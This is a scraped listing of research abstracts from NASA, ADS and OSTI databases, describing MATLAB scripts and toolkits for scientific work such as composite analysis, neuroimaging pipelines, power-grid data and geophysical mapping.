MatLab Script and Functional Programming
NASA Technical Reports Server (NTRS)
Shaykhian, Gholam Ali
2007-01-01
MatLab Script and Functional Programming: MatLab is one of the most widely used very high level programming languages for scientific and engineering computations. It is very user-friendly and needs practically no formal programming knowledge. Presented here are MatLab programming aspects and not just the MatLab commands for scientists and engineers who do not have formal programming training and also have no significant time to spare for learning programming to solve their real world problems. Specifically provided are programs for visualization. The MatLab seminar covers the functional and script programming aspect of MatLab language. Specific expectations are: a) Recognize MatLab commands, script and function. b) Create, and run a MatLab function. c) Read, recognize, and describe MatLab syntax. d) Recognize decisions, loops and matrix operators. e) Evaluate scope among multiple files, and multiple functions within a file. f) Declare, define and use scalar variables, vectors and matrices.
NASA Astrophysics Data System (ADS)
Chęciński, Jakub; Frankowski, Marek
2016-10-01
We present a tool for fully-automated generation of both simulations configuration files (Mif) and Matlab scripts for automated data analysis, dedicated for Object Oriented Micromagnetic Framework (OOMMF). We introduce extended graphical user interface (GUI) that allows for fast, error-proof and easy creation of Mifs, without any programming skills usually required for manual Mif writing necessary. With MAGE we provide OOMMF extensions for complementing it by mangetoresistance and spin-transfer-torque calculations, as well as local magnetization data selection for output. Our software allows for creation of advanced simulations conditions like simultaneous parameters sweeps and synchronic excitation application. Furthermore, since output of such simulation could be long and complicated we provide another GUI allowing for automated creation of Matlab scripts suitable for analysis of such data with Fourier and wavelet transforms as well as user-defined operations.
A Compilation of MATLAB Scripts and Functions for MACGMC Analyses
NASA Technical Reports Server (NTRS)
Murthy, Pappu L. N.; Bednarcyk, Brett A.; Mital, Subodh K.
2017-01-01
The primary aim of the current effort is to provide scripts that automate many of the repetitive pre- and post-processing tasks associated with composite materials analyses using the Micromechanics Analysis Code with the Generalized Method of Cells. This document consists of a compilation of hundreds of scripts that were developed in MATLAB (The Mathworks, Inc., Natick, MA) programming language and consolidated into 16 MATLAB functions. (MACGMC). MACGMC is a composite material and laminate analysis software code developed at NASA Glenn Research Center. The software package has been built around the generalized method of cells (GMC) family of micromechanics theories. The computer code is developed with a user-friendly framework, along with a library of local inelastic, damage, and failure models. Further, application of simulated thermo-mechanical loading, generation of output results, and selection of architectures to represent the composite material have been automated to increase the user friendliness, as well as to make it more robust in terms of input preparation and code execution. Finally, classical lamination theory has been implemented within the software, wherein GMC is used to model the composite material response of each ply. Thus, the full range of GMC composite material capabilities is available for analysis of arbitrary laminate configurations as well. The pre-processing tasks include generation of a multitude of different repeating unit cells (RUCs) for CMCs and PMCs, visualization of RUCs from MACGMC input and output files and generation of the RUC section of a MACGMC input file. The post-processing tasks include visualization of the predicted composite response, such as local stress and strain contours, damage initiation and progression, stress-strain behavior, and fatigue response. In addition to the above, several miscellaneous scripts have been developed that can be used to perform repeated Monte-Carlo simulations to enable probabilistic simulations with minimal manual intervention. This document is formatted to provide MATLAB source files and descriptions of how to utilize them. It is assumed that the user has a basic understanding of how MATLAB scripts work and some MATLAB programming experience.
An automated process for generating archival data files from MATLAB figures
NASA Astrophysics Data System (ADS)
Wallace, G. M.; Greenwald, M.; Stillerman, J.
2016-10-01
A new directive from the White House Office of Science and Technology Policy requires that all publications supported by federal funding agencies (e.g. Department of Energy Office of Science, National Science Foundation) include machine-readable datasets for figures and tables. An automated script was developed at the PSFC to make this process easier for authors using the MATLAB plotting environment to create figures. All relevant data (x, y, z, errorbars) and metadata (line style, color, symbol shape, labels) are contained within the MATLAB .fig file created when saving a figure. The export_fig script extracts data and metadata from a .fig file and exports it into an HDF5 data file with no additional user input required. Support is included for a number of plot types including 2-D and 3-D line, contour, and surface plots, quiver plots, bar graphs, and histograms. This work supported by US Department of Energy cooperative agreement DE-FC02-99ER54512 using the Alcator C-Mod tokamak, a DOE Office of Science user facility.
NASA One-Dimensional Combustor Simulation--User Manual for S1D_ML
NASA Technical Reports Server (NTRS)
Stueber, Thomas J.; Paxson, Daniel E.
2014-01-01
The work presented in this paper is to promote research leading to a closed-loop control system to actively suppress thermo-acoustic instabilities. To serve as a model for such a closed-loop control system, a one-dimensional combustor simulation composed using MATLAB software tools has been written. This MATLAB based process is similar to a precursor one-dimensional combustor simulation that was formatted as FORTRAN 77 source code. The previous simulation process requires modification to the FORTRAN 77 source code, compiling, and linking when creating a new combustor simulation executable file. The MATLAB based simulation does not require making changes to the source code, recompiling, or linking. Furthermore, the MATLAB based simulation can be run from script files within the MATLAB environment or with a compiled copy of the executable file running in the Command Prompt window without requiring a licensed copy of MATLAB. This report presents a general simulation overview. Details regarding how to setup and initiate a simulation are also presented. Finally, the post-processing section describes the two types of files created while running the simulation and it also includes simulation results for a default simulation included with the source code.
Distributed Acoustic Sensing (DAS) Data for Periodic Hydraulic Tests: Hydraulic Data
Cole, Matthew
2015-07-31
Hydraulic responses from periodic hydraulic tests conducted at the Mirror Lake Fractured Rock Research Site, during the summer of 2015. These hydraulic responses were measured also using distributed acoustic sensing (DAS) which is cataloged in a different submission under this grant number. The tests are explained in detail in Matthew Cole's MS Thesis which is cataloged here. The injection and drawdown data and the codes used to analyze the data. Sinusoidal Data is a Matlab data file containing a data table for each period-length test. Within each table is a column labeled: time (seconds since beginning of pumping), Inj_m3pm (formation injection in cubic meters per minute), and head for each observation well (meters). The three Matlab script files (*.m) were used to analyze hydraulic responses from the data file above. High-Pass Sinusoid is a routine for filtering the data, computing the FFT, and extracting phase and amplitude values. Borestore is a routine which contains the borehole storage analytic solution and compares modeled amplitude and phase from this solution to computed amplitude and phase from the data. Patsearch Borestore is a routine containing the built-in pattern search optimization method. This minimizes the total error between modeled and actual amplitude and phase in Borestore. Comments within the script files contain more specific instructions for their use.
NASA Astrophysics Data System (ADS)
Konnik, Mikhail V.; Welsh, James
2012-09-01
Numerical simulators for adaptive optics systems have become an essential tool for the research and development of the future advanced astronomical instruments. However, growing software code of the numerical simulator makes it difficult to continue to support the code itself. The problem of adequate documentation of the astronomical software for adaptive optics simulators may complicate the development since the documentation must contain up-to-date schemes and mathematical descriptions implemented in the software code. Although most modern programming environments like MATLAB or Octave have in-built documentation abilities, they are often insufficient for the description of a typical adaptive optics simulator code. This paper describes a general cross-platform framework for the documentation of scientific software using open-source tools such as LATEX, mercurial, Doxygen, and Perl. Using the Perl script that translates M-files MATLAB comments into C-like, one can use Doxygen to generate and update the documentation for the scientific source code. The documentation generated by this framework contains the current code description with mathematical formulas, images, and bibliographical references. A detailed description of the framework components is presented as well as the guidelines for the framework deployment. Examples of the code documentation for the scripts and functions of a MATLAB-based adaptive optics simulator are provided.
Using the Parallel Computing Toolbox with MATLAB on the Peregrine System |
parallel pool took %g seconds.\\n', toc) % "single program multiple data" spmd fprintf('Worker %d says Hello World!\\n', labindex) end delete(gcp); % close the parallel pool exit To run the script on a compute node, create the file helloWorld.sub: #!/bin/bash #PBS -l walltime=05:00 #PBS -l nodes=1 #PBS -N
Bellec, Pierre; Lavoie-Courchesne, Sébastien; Dickinson, Phil; Lerch, Jason P; Zijdenbos, Alex P; Evans, Alan C
2012-01-01
The analysis of neuroimaging databases typically involves a large number of inter-connected steps called a pipeline. The pipeline system for Octave and Matlab (PSOM) is a flexible framework for the implementation of pipelines in the form of Octave or Matlab scripts. PSOM does not introduce new language constructs to specify the steps and structure of the workflow. All steps of analysis are instead described by a regular Matlab data structure, documenting their associated command and options, as well as their input, output, and cleaned-up files. The PSOM execution engine provides a number of automated services: (1) it executes jobs in parallel on a local computing facility as long as the dependencies between jobs allow for it and sufficient resources are available; (2) it generates a comprehensive record of the pipeline stages and the history of execution, which is detailed enough to fully reproduce the analysis; (3) if an analysis is started multiple times, it executes only the parts of the pipeline that need to be reprocessed. PSOM is distributed under an open-source MIT license and can be used without restriction for academic or commercial projects. The package has no external dependencies besides Matlab or Octave, is straightforward to install and supports of variety of operating systems (Linux, Windows, Mac). We ran several benchmark experiments on a public database including 200 subjects, using a pipeline for the preprocessing of functional magnetic resonance images (fMRI). The benchmark results showed that PSOM is a powerful solution for the analysis of large databases using local or distributed computing resources.
Bellec, Pierre; Lavoie-Courchesne, Sébastien; Dickinson, Phil; Lerch, Jason P.; Zijdenbos, Alex P.; Evans, Alan C.
2012-01-01
The analysis of neuroimaging databases typically involves a large number of inter-connected steps called a pipeline. The pipeline system for Octave and Matlab (PSOM) is a flexible framework for the implementation of pipelines in the form of Octave or Matlab scripts. PSOM does not introduce new language constructs to specify the steps and structure of the workflow. All steps of analysis are instead described by a regular Matlab data structure, documenting their associated command and options, as well as their input, output, and cleaned-up files. The PSOM execution engine provides a number of automated services: (1) it executes jobs in parallel on a local computing facility as long as the dependencies between jobs allow for it and sufficient resources are available; (2) it generates a comprehensive record of the pipeline stages and the history of execution, which is detailed enough to fully reproduce the analysis; (3) if an analysis is started multiple times, it executes only the parts of the pipeline that need to be reprocessed. PSOM is distributed under an open-source MIT license and can be used without restriction for academic or commercial projects. The package has no external dependencies besides Matlab or Octave, is straightforward to install and supports of variety of operating systems (Linux, Windows, Mac). We ran several benchmark experiments on a public database including 200 subjects, using a pipeline for the preprocessing of functional magnetic resonance images (fMRI). The benchmark results showed that PSOM is a powerful solution for the analysis of large databases using local or distributed computing resources. PMID:22493575
Creating and Searching a Local Inventory for Data Granules in a Remote Archive
NASA Astrophysics Data System (ADS)
Cornillon, P. C.
2016-12-01
More often than not, search capabilities for network accessible data do not exist or do not meet the requirements of the user. For large archives this can make finding data of interest tedious at best. This summer, the author encountered such a problem with regard to the two existing archives of VIIRS L2 sea surface temperature (SST) fields obtained with the new ACSPO retrieval algorithm; one at the Jet Propulsion Laboratory's PO-DAAC and the other at NOAA's National Centers for Environmental Information (NCEI). In both cases the data were available via ftp and OPeNDAP but there was no search capability at the PO-DAAC and the NCEI archive was incomplete. Furthermore, in order to meet the needs of a broad range of datasets and users, the beta version of the search engine at NCEI was cumbersome for the searches of interest. Although some of these problems have been resolved since (and may be described in other posters/presentations at this meeting), the solution described in this presentation offers the user the ability to develop a search capability for archives lacking a search capability and/or to configure searches more to his or her preferences than the generic searches offered by the data provider. The solution, a Matlab script, used html access to the PO-DAAC web site to locate all VIIRS 10 minute granules and OPeNDAP access to acquire the bounding box for each granule from the metadata bound to the file. This task required several hours of wall time to acquire the data and to write the bounding boxes to a local file with the associated ftp and OPeNDAP urls for the 110,000+ granule archive. A second Matlab script searched the local archive, seconds, for granules falling in a user defined space-time window and an ascii file of wget commands associated with these was generated. This file was then executed to acquire the data of interest. The wget commands can be configured to acquire the entire files via ftp or a subset of each file via OPeNDAP. Furthermore, the search capability, based on bounding boxes and rectangular regions, could easily be modified to further refine the search. Finally, the script that builds the inventory has been designed to update the local inventory, minutes per month rather than hours.
Deterministic modelling and stochastic simulation of biochemical pathways using MATLAB.
Ullah, M; Schmidt, H; Cho, K H; Wolkenhauer, O
2006-03-01
The analysis of complex biochemical networks is conducted in two popular conceptual frameworks for modelling. The deterministic approach requires the solution of ordinary differential equations (ODEs, reaction rate equations) with concentrations as continuous state variables. The stochastic approach involves the simulation of differential-difference equations (chemical master equations, CMEs) with probabilities as variables. This is to generate counts of molecules for chemical species as realisations of random variables drawn from the probability distribution described by the CMEs. Although there are numerous tools available, many of them free, the modelling and simulation environment MATLAB is widely used in the physical and engineering sciences. We describe a collection of MATLAB functions to construct and solve ODEs for deterministic simulation and to implement realisations of CMEs for stochastic simulation using advanced MATLAB coding (Release 14). The program was successfully applied to pathway models from the literature for both cases. The results were compared to implementations using alternative tools for dynamic modelling and simulation of biochemical networks. The aim is to provide a concise set of MATLAB functions that encourage the experimentation with systems biology models. All the script files are available from www.sbi.uni-rostock.de/ publications_matlab-paper.html.
An OpenMI Implementation of a Water Resources System using Simple Script Wrappers
NASA Astrophysics Data System (ADS)
Steward, D. R.; Aistrup, J. A.; Kulcsar, L.; Peterson, J. M.; Welch, S. M.; Andresen, D.; Bernard, E. A.; Staggenborg, S. A.; Bulatewicz, T.
2013-12-01
This team has developed an adaption of the Open Modelling Interface (OpenMI) that utilizes Simple Script Wrappers. Code is made OpenMI compliant through organization within three modules that initialize, perform time steps, and finalize results. A configuration file is prepared that specifies variables a model expects to receive as input and those it will make available as output. An example is presented for groundwater, economic, and agricultural production models in the High Plains Aquifer region of Kansas. Our models use the programming environments in Scilab and Matlab, along with legacy Fortran code, and our Simple Script Wrappers can also use Python. These models are collectively run within this interdisciplinary framework from initial conditions into the future. It will be shown that by applying model constraints to one model, the impact may be accessed on changes to the water resources system.
SU-E-J-114: Web-Browser Medical Physics Applications Using HTML5 and Javascript.
Bakhtiari, M
2012-06-01
Since 2010, there has been a great attention about HTML5. Application developers and browser makers fully embrace and support the web of the future. Consumers have started to embrace HTML5, especially as more users understand the benefits and potential that HTML5 can mean for the future.Modern browsers such as Firefox, Google Chrome, and Safari are offering better and more robust support for HTML5, CSS3, and JavaScript. The idea is to introduce the HTML5 to medical physics community for open source software developments. The benefit of using HTML5 is developing portable software systems. The HTML5, CSS, and JavaScript programming languages were used to develop several applications for Quality Assurance in radiation therapy. The canvas element of HTML5 was used for handling and displaying the images, and JavaScript was used to manipulate the data. Sample application were developed to: 1. analyze the flatness and symmetry of the radiotherapy fields in a web browser, 2.analyze the Dynalog files from Varian machines, 3. visualize the animated Dynamic MLC files, 4. Simulation via Monte Carlo, and 5. interactive image manipulation. The programs showed great performance and speed in uploading the data and displaying the results. The flatness and symmetry program and Dynalog file analyzer ran in a fraction of second. The reason behind this performance is using JavaScript language which is a lower level programming language in comparison to the most of the scientific programming packages such as Matlab. The second reason is that JavaScript runs locally on client side computers not on the web-servers. HTML5 and JavaScript can be used to develop useful applications that can be run online or offline on different modern web-browsers. The programming platform can be also one of the modern web-browsers which are mostly open source (such as Firefox). © 2012 American Association of Physicists in Medicine.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Swyer, Michael; Davatzes, Nicholas; Cladouhos, Trenton
Matlab scripts and functions and data used to build Poly3D models and create permeability potential layers for 1) St. Helens Shear Zone, 2) Wind River Valley, and 3) Mount Baker geothermal prospect areas located in Washington state.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Talamo, Alberto; Gohar, Yousry
2016-06-01
This report describes different methodologies to calculate the effective neutron multiplication factor of subcritical assemblies by processing the neutron detector signals using MATLAB scripts. The subcritical assembly can be driven either by a spontaneous fission neutron source (e.g. californium) or by a neutron source generated from the interactions of accelerated particles with target materials. In the latter case, when the particle accelerator operates in a pulsed mode, the signals are typically stored into two files. One file contains the time when neutron reactions occur and the other contains the times when the neutron pulses start. In both files, the timemore » is given by an integer representing the number of time bins since the start of the counting. These signal files are used to construct the neutron count distribution from a single neutron pulse. The built-in functions of MATLAB are used to calculate the effective neutron multiplication factor through the application of the prompt decay fitting or the area method to the neutron count distribution. If the subcritical assembly is driven by a spontaneous fission neutron source, then the effective multiplication factor can be evaluated either using the prompt neutron decay constant obtained from Rossi or Feynman distributions or the Modified Source Multiplication (MSM) method.« less
SU-F-T-458: Tracking Trends of TG-142 Parameters Via Analysis of Data Recorded by 2D Chamber Array
DOE Office of Scientific and Technical Information (OSTI.GOV)
Alexandrian, A; Kabat, C; Defoor, D
Purpose: With increasing QA demands of medical physicists in clinical radiation oncology, the need for an effective method of tracking clinical data has become paramount. A tool was produced which scans through data automatically recorded by a 2D chamber array and extracts relevant information recommended by TG-142. Using this extracted information a timely and comprehensive analysis of QA parameters can be easily performed enabling efficient monthly checks on multiple linear accelerators simultaneously. Methods: A PTW STARCHECK chamber array was used to record several months of beam outputs from two Varian 2100 series linear accelerators and a Varian NovalisTx−. In conjunctionmore » with the chamber array, a beam quality phantom was used to simultaneously to determine beam quality. A minimalist GUI was created in MatLab that allows a user to set the file path of the data for each modality to be analyzed. These file paths are recorded to a MatLab structure and then subsequently accessed by a script written in Python (version 3.5.1) which then extracts values required to perform monthly checks as outlined by recommendations from TG-142. The script incorporates calculations to determine if the values recorded by the chamber array fall within an acceptable threshold. Results: Values obtained by the script are written to a spreadsheet where results can be easily viewed and annotated with a “pass” or “fail” and saved for further analysis. In addition to creating a new scheme for reviewing monthly checks, this application allows for able to succinctly store data for follow up analysis. Conclusion: By utilizing this tool, parameters recommended by TG-142 for multiple linear accelerators can be rapidly obtained and analyzed which can be used for evaluation of monthly checks.« less
Mathematical Formulation used by MATLAB Code to Convert FTIR Interferograms to Calibrated Spectra
DOE Office of Scientific and Technical Information (OSTI.GOV)
Armstrong, Derek Elswick
This report discusses the mathematical procedures used to convert raw interferograms from Fourier transform infrared (FTIR) sensors to calibrated spectra. The work discussed in this report was completed as part of the Helios project at Los Alamos National Laboratory. MATLAB code was developed to convert the raw interferograms to calibrated spectra. The report summarizes the developed MATLAB scripts and functions, along with a description of the mathematical methods used by the code. The first step in working with raw interferograms is to convert them to uncalibrated spectra by applying an apodization function to the raw data and then by performingmore » a Fourier transform. The developed MATLAB code also addresses phase error correction by applying the Mertz method. This report provides documentation for the MATLAB scripts.« less
PMU Data Event Detection: A User Guide for Power Engineers
DOE Office of Scientific and Technical Information (OSTI.GOV)
Allen, A.; Singh, M.; Muljadi, E.
2014-10-01
This user guide is intended to accompany a software package containing a Matrix Laboratory (MATLAB) script and related functions for processing phasor measurement unit (PMU) data. This package and guide have been developed by the National Renewable Energy Laboratory and the University of Texas at Austin. The objective of this data processing exercise is to discover events in the vast quantities of data collected by PMUs. This document attempts to cover some of the theory behind processing the data to isolate events as well as the functioning of the MATLAB scripts. The report describes (1) the algorithms and mathematical backgroundmore » that the accompanying MATLAB codes use to detect events in PMU data and (2) the inputs required from the user and the outputs generated by the scripts.« less
NASA Astrophysics Data System (ADS)
Duffy, Alan; Yates, Brian; Takacs, Peter
2012-09-01
The Optical Metrology Facility at the Canadian Light Source (CLS) has recently purchased MountainsMap surface analysis software from Digital Surf and we report here our experiences with this package and its usefulness as a tool for examining metrology data of synchrotron x-ray mirrors. The package has a number of operators that are useful for determining surface roughness and slope error including compliance with ISO standards (viz. ISO 4287 and ISO 25178). The software is extensible with MATLAB scripts either by loading an m-file or by a user written script. This makes it possible to apply a custom operator to measurement data sets. Using this feature we have applied the simple six-line MATLAB code for the direct least square fitting of ellipses developed by Fitzgibbon et. al. to investigate the residual slope error of elliptical mirrors upon the removal of the best-fit-ellipse. The software includes support for many instruments (e.g. Zygo, MicroMap, etc...) and can import ASCII data (e.g. LTP data). The stitching module allows the user to assemble overlapping images and we report on our experiences with this feature applied to MicroMap surface roughness data. The power spectral density function was determined for the stitched and unstitched data and compared.
GPS Modeling and Analysis. Summary of Research: GPS Satellite Axial Ratio Predictions
NASA Technical Reports Server (NTRS)
Axelrad, Penina; Reeh, Lisa
2002-01-01
This report outlines the algorithms developed at the Colorado Center for Astrodynamics Research to model yaw and predict the axial ratio as measured from a ground station. The algorithms are implemented in a collection of Matlab functions and scripts that read certain user input, such as ground station coordinates, the UTC time, and the desired GPS (Global Positioning System) satellites, and compute the above-mentioned parameters. The position information for the GPS satellites is obtained from Yuma almanac files corresponding to the prescribed date. The results are displayed graphically through time histories and azimuth-elevation plots.
Improve Problem Solving Skills through Adapting Programming Tools
NASA Technical Reports Server (NTRS)
Shaykhian, Linda H.; Shaykhian, Gholam Ali
2007-01-01
There are numerous ways for engineers and students to become better problem-solvers. The use of command line and visual programming tools can help to model a problem and formulate a solution through visualization. The analysis of problem attributes and constraints provide insight into the scope and complexity of the problem. The visualization aspect of the problem-solving approach tends to make students and engineers more systematic in their thought process and help them catch errors before proceeding too far in the wrong direction. The problem-solver identifies and defines important terms, variables, rules, and procedures required for solving a problem. Every step required to construct the problem solution can be defined in program commands that produce intermediate output. This paper advocates improved problem solving skills through using a programming tool. MatLab created by MathWorks, is an interactive numerical computing environment and programming language. It is a matrix-based system that easily lends itself to matrix manipulation, and plotting of functions and data. MatLab can be used as an interactive command line or a sequence of commands that can be saved in a file as a script or named functions. Prior programming experience is not required to use MatLab commands. The GNU Octave, part of the GNU project, a free computer program for performing numerical computations, is comparable to MatLab. MatLab visual and command programming are presented here.
NASA Technical Reports Server (NTRS)
Sen, Syamal K.; Shaykhian, Gholam Ali
2011-01-01
MatLab(R) (MATrix LABoratory) is a numerical computation and simulation tool that is used by thousands Scientists and Engineers in many cou ntries. MatLab does purely numerical calculations, which can be used as a glorified calculator or interpreter programming language; its re al strength is in matrix manipulations. Computer algebra functionalities are achieved within the MatLab environment using "symbolic" toolbo x. This feature is similar to computer algebra programs, provided by Maple or Mathematica to calculate with mathematical equations using s ymbolic operations. MatLab in its interpreter programming language fo rm (command interface) is similar with well known programming languag es such as C/C++, support data structures and cell arrays to define c lasses in object oriented programming. As such, MatLab is equipped with most ofthe essential constructs of a higher programming language. M atLab is packaged with an editor and debugging functionality useful t o perform analysis of large MatLab programs and find errors. We belie ve there are many ways to approach real-world problems; prescribed methods to ensure foregoing solutions are incorporated in design and ana lysis of data processing and visualization can benefit engineers and scientist in gaining wider insight in actual implementation of their perspective experiments. This presentation will focus on data processing and visualizations aspects of engineering and scientific applicati ons. Specifically, it will discuss methods and techniques to perform intermediate-level data processing covering engineering and scientifi c problems. MatLab programming techniques including reading various data files formats to produce customized publication-quality graphics, importing engineering and/or scientific data, organizing data in tabu lar format, exporting data to be used by other software programs such as Microsoft Excel, data presentation and visualization will be discussed. The presentation will emphasize creating practIcal scripts (pro grams) that extend the basic features of MatLab TOPICS mclude (1) Ma trix and vector analysis and manipulations (2) Mathematical functions (3) Symbolic calculations & functions (4) Import/export data files (5) Program lOgic and flow control (6) Writing function and passing parameters (7) Test application programs
Case studies on optimization problems in MATLAB and COMSOL multiphysics by means of the livelink
NASA Astrophysics Data System (ADS)
Ozana, Stepan; Pies, Martin; Docekal, Tomas
2016-06-01
LiveLink for COMSOL is a tool that integrates COMSOL Multiphysics with MATLAB to extend one's modeling with scripting programming in the MATLAB environment. It allows user to utilize the full power of MATLAB and its toolboxes in preprocessing, model manipulation, and post processing. At first, the head script launches COMSOL with MATLAB and defines initial value of all parameters, refers to the objective function J described in the objective function and creates and runs the defined optimization task. Once the task is launches, the COMSOL model is being called in the iteration loop (from MATLAB environment by use of API interface), changing defined optimization parameters so that the objective function is minimized, using fmincon function to find a local or global minimum of constrained linear or nonlinear multivariable function. Once the minimum is found, it returns exit flag, terminates optimization and returns the optimized values of the parameters. The cooperation with MATLAB via LiveLink enhances a powerful computational environment with complex multiphysics simulations. The paper will introduce using of the LiveLink for COMSOL for chosen case studies in the field of technical cybernetics and bioengineering.
Using the Generic Mapping Tools From Within the MATLAB, Octave and Julia Computing Environments
NASA Astrophysics Data System (ADS)
Luis, J. M. F.; Wessel, P.
2016-12-01
The Generic Mapping Tools (GMT) is a widely used software infrastructure tool set for analyzing and displaying geoscience data. Its power to analyze and process data and produce publication-quality graphics has made it one of several standard processing toolsets used by a large segment of the Earth and Ocean Sciences. GMT's strengths lie in superior publication-quality vector graphics, geodetic-quality map projections, robust data processing algorithms scalable to enormous data sets, and ability to run under all common operating systems. The GMT tool chest offers over 120 modules sharing a common set of command options, file structures, and documentation. GMT modules are command line tools that accept input and write output, and this design allows users to write scripts in which one module's output becomes another module's input, creating highly customized GMT workflows. With the release of GMT 5, these modules are high-level functions with a C API, potentially allowing users access to high-level GMT capabilities from any programmable environment. Many scientists who use GMT also use other computational tools, such as MATLAB® and its clone Octave. We have built a MATLAB/Octave interface on top of the GMT 5 C API. Thus, MATLAB or Octave now has full access to all GMT modules as well as fundamental input/output of GMT data objects via a MEX function. Internally, the GMT/MATLAB C API defines six high-level composite data objects that handle input and output of data via individual GMT modules. These are data tables, grids, text tables (text/data mixed records), color palette tables, raster images (1-4 color bands), and PostScript. The API is responsible for translating between the six GMT objects and the corresponding native MATLAB objects. References to data arrays are passed if transposing of matrices is not required. The GMT and MATLAB/Octave combination is extremely flexible, letting the user harvest the general numerical and graphical capabilities of both systems, and represents a giant step forward in interoperability between GMT and other software package. We will present examples of the symbiotic benefits of combining these platforms. Two other extensions are also in the works: a nearly finished Julia wrapper and an embryonic Python module. Publication supported by FCT- project UID/GEO/50019/2013 - Instituto D. Luiz
Piezoelectric Actuator Modeling Using MSC/NASTRAN and MATLAB
NASA Technical Reports Server (NTRS)
Reaves, Mercedes C.; Horta, Lucas G.
2003-01-01
This paper presents a procedure for modeling structures containing piezoelectric actuators using MSCMASTRAN and MATLAB. The paper describes the utility and functionality of one set of validated modeling tools. The tools described herein use MSCMASTRAN to model the structure with piezoelectric actuators and a thermally induced strain to model straining of the actuators due to an applied voltage field. MATLAB scripts are used to assemble the dynamic equations and to generate frequency response functions. The application of these tools is discussed using a cantilever aluminum beam with a surface mounted piezoelectric actuator as a sample problem. Software in the form of MSCINASTRAN DMAP input commands, MATLAB scripts, and a step-by-step procedure to solve the example problem are provided. Analysis results are generated in terms of frequency response functions from deflection and strain data as a function of input voltage to the actuator.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Haas, Nicholas Q; Gillen, Robert E; Karnowski, Thomas P
MathWorks' MATLAB is widely used in academia and industry for prototyping, data analysis, data processing, etc. Many users compile their programs using the MATLAB Compiler to run on workstations/computing clusters via the free MATLAB Compiler Runtime (MCR). The MCR facilitates the execution of code calling Application Programming Interfaces (API) functions from both base MATLAB and MATLAB toolboxes. In a Linux environment, a sizable number of third-party runtime dependencies (i.e. shared libraries) are necessary. Unfortunately, to the MTLAB community's knowledge, these dependencies are not documented, leaving system administrators and/or end-users to find/install the necessary libraries either as runtime errors resulting frommore » them missing or by inspecting the header information of Executable and Linkable Format (ELF) libraries of the MCR to determine which ones are missing from the system. To address various shortcomings, Docker Images based on Community Enterprise Operating System (CentOS) 7, a derivative of Redhat Enterprise Linux (RHEL) 7, containing recent (2015-2017) MCR releases and their dependencies were created. These images, along with a provided sample Docker Compose YAML Script, can be used to create a simulated computing cluster where MATLAB Compiler created binaries can be executed using a sample Slurm Workload Manager script.« less
Developing Matlab scripts for image analysis and quality assessment
NASA Astrophysics Data System (ADS)
Vaiopoulos, A. D.
2011-11-01
Image processing is a very helpful tool in many fields of modern sciences that involve digital imaging examination and interpretation. Processed images however, often need to be correlated with the original image, in order to ensure that the resulting image fulfills its purpose. Aside from the visual examination, which is mandatory, image quality indices (such as correlation coefficient, entropy and others) are very useful, when deciding which processed image is the most satisfactory. For this reason, a single program (script) was written in Matlab language, which automatically calculates eight indices by utilizing eight respective functions (independent function scripts). The program was tested in both fused hyperspectral (Hyperion-ALI) and multispectral (ALI, Landsat) imagery and proved to be efficient. Indices were found to be in agreement with visual examination and statistical observations.
Development of MATLAB Scripts for the Calculation of Thermal Manikin Regional Resistance Values
2016-01-01
CALCULATION OF THERMAL MANIKIN REGIONAL RESISTANCE VALUES DISCLAIMER The opinions or assertions contained herein are the private views of the...USARIEM TECHNICAL NOTE TN16-1 DEVELOPMENT OF MATLAB® SCRIPTS FOR THE CALCULATION OF THERMAL MANIKIN REGIONAL RESISTANCE VALUES...performed by thermal manikin and modeling personnel. Steps to operate the scripts as well as the underlying calculations are outlined in detail
Michael Swyer
2015-02-05
Matlab scripts/functions and data used to build Poly3D models and create permeability potential GIS layers for 1) Mount St Helen's, 2) Wind River Valley, and 3) Mount Baker geothermal prospect areas located in Washington state.
Earth Science Curriculum Enrichment Through Matlab!
NASA Astrophysics Data System (ADS)
Salmun, H.; Buonaiuto, F. S.
2016-12-01
The use of Matlab in Earth Science undergraduate courses in the Department of Geography at Hunter College began as a pilot project in Fall 2008 and has evolved and advanced to being a significant component of an Advanced Oceanography course, the selected tool for data analysis in other courses and the main focus of a graduate course for doctoral students at The city University of New York (CUNY) working on research related to geophysical, oceanic and atmospheric dynamics. The primary objectives of these efforts were to enhance the Earth Science curriculum through course specific applications, to increase undergraduate programming and data analysis skills, and to develop a Matlab users network within the Department and the broader Hunter College and CUNY community. Students have had the opportunity to learn Matlab as a stand-alone course, within an independent study group, or as a laboratory component within related STEM classes. All of these instructional efforts incorporated the use of prepackaged Matlab exercises and a research project. Initial exercises were designed to cover basic scripting and data visualization techniques. Students were provided data and a skeleton script to modify and improve upon based on the laboratory instructions. As student's programming skills increased throughout the semester more advanced scripting, data mining and data analysis were assigned. In order to illustrate the range of applications within the Earth Sciences, laboratory exercises were constructed around topics selected from the disciplines of Geology, Physics, Oceanography, Meteorology and Climatology. In addition the structure of the research component of the courses included both individual and team projects.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Plimpton, Steve; Jones, Matt; Crozier, Paul
2006-01-01
Pizza.py is a loosely integrated collection of tools, many of which provide support for the LAMMPS molecular dynamics and ChemCell cell modeling packages. There are tools to create input files. convert between file formats, process log and dump files, create plots, and visualize and animate simulation snapshots. Software packages that are wrapped by Pizza.py. so they can invoked from within Python, include GnuPlot, MatLab, Raster3d. and RasMol. Pizza.py is written in Python and runs on any platform that supports Python. Pizza.py enhances the standard Python interpreter in a few simple ways. Its tools are Python modules which can be invokedmore » interactively, from scripts, or from GUIs when appropriate. Some of the tools require additional Python packages to be installed as part of the users Python. Others are wrappers on software packages (as listed above) which must be available on the users system. It is easy to modify or extend Pizza.py with new functionality or new tools, which need not have anything to do with LAMMPS or ChemCell.« less
Complete scanpaths analysis toolbox.
Augustyniak, Piotr; Mikrut, Zbigniew
2006-01-01
This paper presents a complete open software environment for control, data processing and assessment of visual experiments. Visual experiments are widely used in research on human perception physiology and the results are applicable to various visual information-based man-machine interfacing, human-emulated automatic visual systems or scanpath-based learning of perceptual habits. The toolbox is designed for Matlab platform and supports infra-red reflection-based eyetracker in calibration and scanpath analysis modes. Toolbox procedures are organized in three layers: the lower one, communicating with the eyetracker output file, the middle detecting scanpath events on a physiological background and the one upper consisting of experiment schedule scripts, statistics and summaries. Several examples of visual experiments carried out with use of the presented toolbox complete the paper.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Hughes, T.P.; Clark, R.M.; Mostrom, M.A.
